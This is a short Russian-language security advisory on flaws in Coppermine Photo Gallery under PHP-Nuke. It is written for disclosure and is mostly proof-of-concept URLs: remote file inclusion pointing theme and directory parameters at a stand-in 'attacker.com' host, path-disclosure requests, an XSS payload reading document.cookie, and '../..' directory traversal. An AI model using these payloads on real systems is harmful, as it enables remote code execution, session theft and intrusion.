Программа: Coppermine Photo Gallery 1.2.2b, 1.2.0 RC4 

Несколько уязвимостей обнаружено в Coppermine Photo Gallery. Удаленный пользователь может выполнить произвольный PHP код на целевой системе, выполнить XSS нападение и определить инсталляционный путь. 

1 PHP including: 

http://localhost/nuke69j1/modules/coppermine/include/ init.inc.php?CPG_M_DIR=
http://at tacker.com
http://localhost/nuke72/modules/coppermine/themes/ default/theme.php?THEME_DIR=
http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/ coppercop/theme.php?THEME_DIR=
http://attacker.com
http://localhost/nuke72/modules/coppermine/themes/ maze/theme.php?THEME_DIR=
http://attacker.com

2. Раскрытие инсталляционного пути: 

http://localhost/nuke72/modules/coppermine/ phpinfo.php
http://localhost/nuke72/modules/coppermine/ addpic.php
ht tp://localhost/nuke72/modules/coppermine/ config.php
http://localhost/nuke72/modules/coppermine/ db_input.php
http://localhost/nuke72/modules/coppermine/ displayecard.php
http://localhost/nuke72/modules/coppermine/ ecard.php
http://localhost/nuke72/modules/coppermine/ include/crop.inc.php

3. XSS: 
http://localhost/nuke72/modules/coppermine/docs/ menu.inc.php?CPG_URL=foobar">
[xsscode here]
http://localhost/nuke72/modules/coppermine/docs/ menu.inc.php?CPG_URL=foobar">
<body%20onload=alert(document.cookie);>

4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями): 

http://localhost/nuke72/modules.php?name= coppermine&file=searchnew&startdir=../..

Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии